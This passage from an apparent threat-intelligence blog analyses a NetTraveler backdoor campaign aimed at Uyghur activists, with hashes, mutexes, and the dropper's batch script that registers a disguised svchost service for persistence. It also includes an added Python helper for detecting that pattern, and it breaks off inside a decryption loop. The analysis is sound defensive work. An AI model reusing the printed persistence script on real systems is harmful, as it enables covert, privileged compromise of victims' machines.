We have written about NetTraveler before [here](http://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/) and here. Earlier this year, we observed an uptick in the number of attacks against Uyghur and Tibetan supporters using an updated version of the NetTraveler backdoor. Here's an example of a targeted spear-phishing e-mail directed at Uyghur activists in March 2014. The e-mail has two attachments, a non-malicious JPG file and a 373 KB Microsoft Word .DOC file.

|File name|"Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki ashkarilanmaqta.doc"|
|---|---|
|MD5|b2385963d3afece16bd7478b4cf290ce|
|Size|381,667 bytes|

The .DOC file, which in reality is a "Single File Web Page" container, also known as a "Web archive file", appears to have been created on a system using Microsoft Office - Simplified Chinese. It contains an exploit for the CVE-2012-0158 vulnerability, detected by Kaspersky Lab products as

If run on a vulnerable version of Microsoft Office, it drops the main module as "net.exe" (detected by Kaspersky Lab products as Trojan-Dropper.Win32.Agent.lifr), which in turn installs a number of other files.
The main C&C module is dumped into "%SystemRoot%\system32\Windowsupdataney.dll" (detected by Kaspersky as Trojan-Spy.Win32.TravNet.qfr).

|Name|WINDOWSUPDATANEY.DLL|
|---|---|
|MD5|c13c79ad874215cfec8d318468e3d116|
|Size|37,888 bytes|

It is registered as a service (named "Windowsupdata") through a Windows Batch file named "DOT.BAT" (detected by Kaspersky Lab products as Trojan.BAT.Tiny.b):

```
@echo off
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v Windowsupdata /t REG_MULTI_SZ /d Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ImagePath /t REG_EXPAND_SZ /d %SystemRoot%\System32\svchost.exe -k Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v DisplayName /t REG_SZ /d Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ObjectName /t REG_SZ /d LocalSystem /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ErrorControl /t REG_DWORD /d 1 /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v Start /t REG_DWORD /d 2 /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\Windowsupdataney.dll /f
```

To make sure the malware isn't running multiple times, it uses the mutex "SD_2013 Is Running!" to mark its presence in the system. Other known mutexes used by older and current variants include:

- Boat-12 Is Running!
- DocHunter2012 Is Running!
- Hunter-2012 Is Running!
- NT-2012 Is Running!
- NetTravler2012 Is Running!
- SH-2011 Is Running!
- ShengHai Is Running!
- SD2013 is Running!
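The DOT.BAT script above is a compact record of the persistence technique: it creates a new svchost group, registers an auto-start LocalSystem service hosted by svchost.exe, and points that service's ServiceDll at the dropped module. The following Python is an added triage helper, not code from the post or from Kaspersky; it parses `reg add` commands from a batch script into a registry map and summarises every svchost-hosted service it finds, so an analyst can pull these indicators out of a recovered dropper script without running it. The sample input is a constructed copy of the DOT.BAT lines quoted above.

```python
import re

# Constructed copy of the DOT.BAT commands quoted in the post, used here as sample input.
DOT_BAT = r'''@echo off
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v Windowsupdata /t REG_MULTI_SZ /d Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ImagePath /t REG_EXPAND_SZ /d %SystemRoot%\System32\svchost.exe -k Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v DisplayName /t REG_SZ /d Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ObjectName /t REG_SZ /d LocalSystem /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ErrorControl /t REG_DWORD /d 1 /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v Start /t REG_DWORD /d 2 /f
@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\Windowsupdataney.dll /f
'''

# One 'reg add' command: quoted key, /v name, /t type, /d data (may contain spaces), /f.
REG_ADD = re.compile(
    r'^@?reg\s+add\s+"(?P<key>[^"]+)"\s+/v\s+(?P<name>\S+)\s+/t\s+\S+\s+/d\s+(?P<data>.+?)\s+/f\s*$',
    re.IGNORECASE)

def parse_reg_adds(script):
    """Return {registry key: {value name (lower-cased): data}} for every 'reg add' line."""
    keys = {}
    for line in script.splitlines():
        m = REG_ADD.match(line.strip())
        if m:
            keys.setdefault(m['key'], {})[m['name'].lower()] = m['data']
    return keys

def svchost_services(keys):
    """Summarise each service the script registers to run inside svchost.exe."""
    # svchost groups the script itself creates under ...\CurrentVersion\Svchost
    groups = set()
    for key, values in keys.items():
        if key.lower().endswith(r'\currentversion\svchost'):
            groups.update(values)
    out = []
    for key, values in keys.items():
        svc = re.search(r'\\services\\([^\\]+)$', key, re.IGNORECASE)
        grp = re.search(r'svchost\.exe\s+-k\s+(\S+)', values.get('imagepath', ''), re.IGNORECASE)
        if not svc or not grp:
            continue
        params = next((v for k, v in keys.items() if k.lower() == key.lower() + r'\parameters'), {})
        out.append({
            'service': svc.group(1),
            'svchost_group': grp.group(1),
            'group_created_by_script': grp.group(1).lower() in groups,
            'service_dll': params.get('servicedll'),
            'auto_start': values.get('start') == '2',
            'runs_as': values.get('objectname'),
        })
    return out
```

A service whose svchost group is created by the same script that registers it, with a ServiceDll in system32 under a name no Microsoft component uses, is the combination worth alerting on; the same summary can be produced from a live registry export by feeding it the equivalent key/value pairs.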
The malware configuration file is written to the "SYSTEM" folder (as opposed to SYSTEM32) and has a slightly new format compared to "older" NetTraveler samples.

For the record, here's what an older NetTraveler config file looks like:

Obviously, the developers behind NetTraveler have taken steps to try to hide the malware's configuration. Luckily, the encryption is relatively simple to break. The algorithm is as follows:

for (i=0;i